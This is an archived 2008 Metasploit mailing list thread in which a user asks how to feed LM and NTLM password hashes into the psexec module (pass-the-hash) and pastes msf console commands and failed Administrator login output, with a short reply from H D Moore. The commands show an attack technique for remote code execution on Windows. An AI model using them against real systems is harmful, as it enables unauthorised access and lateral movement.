Metasploit mailing list archives
Using LM and NTLM Hashes with Metasploit's psexec
From: mathewbrown at fastmail.fm (Mathew Brown)
Date: Fri, 11 Apr 2008 20:21:56 -0700
Hi HD, Thank you for your reply, but I can't seem to get it to work. Also, where would I get the NTLM response from? I currently have the LM and NTLM hashes, not responses. I tried setting it to the LM:NTLM hash but it failed. I then tried it with just the NTLM hash and it also failed. Finally, I tried it in the :NTLM: format and it failed. Here's an example of what it tells me (the hash isn't really important since it's a test machine): msf exploit(psexec) > set SMBPass ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1::: SMBPass => ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1::: msf exploit(psexec) > exploit [*] Started reverse handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) msf exploit(psexec) > set SMBPass b9d2d4957b330b503cc792eb6a55bb1 SMBPass => b9d2d4957b330b503cc792eb6a55bb1 msf exploit(psexec) > exploit [*] Started reverse handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) msf exploit(psexec) > set SMBPass :b9d2d4957b330b503cc792eb6a55bb1f: msf exploit(psexec) > exploit [*] Started reverse handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) Also, how would psexec differentiate between you sending it an NTLM hash to use for authentication and you sending it a password? In the example above, what if my password was b9d2d4957b330b503cc792eb6a55bb1f? How would psexec know that this was an NTLM hash and not a password? Any ideas? Thanks for your help. PS. I'm currently running Metasploit v3.1. After the failed attempts above, I verified that psexec works fine when I provide it with the real password and not the LM or NTLM hashes.
On Friday 11 April 2008, H D Moore wrote: I think you can just set SMBPass to the NTLM response and call it done (thanks grutz!). -HD On Friday 11 April 2008, Mathew Brown wrote:Hi, After running info windows/smb/psexec in metasploit, it tells me: "This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload." I currently have the LM and NTLM hashes for a valid account on a remote machine but not the actual password. How would I pass this information to the SMBPass variable. Should I just put it as LM:HASH? Thanks. -- Mathew Brown mathewbrown at fastmail.fm
-- Mathew Brown mathewbrown at fastmail.fm -- http://www.fastmail.fm - The professional email service
Current thread:
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 11)
- Using LM and NTLM Hashes with Metasploit's psexec H D Moore (Apr 11)
- <Possible follow-ups>
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 11)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 13)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)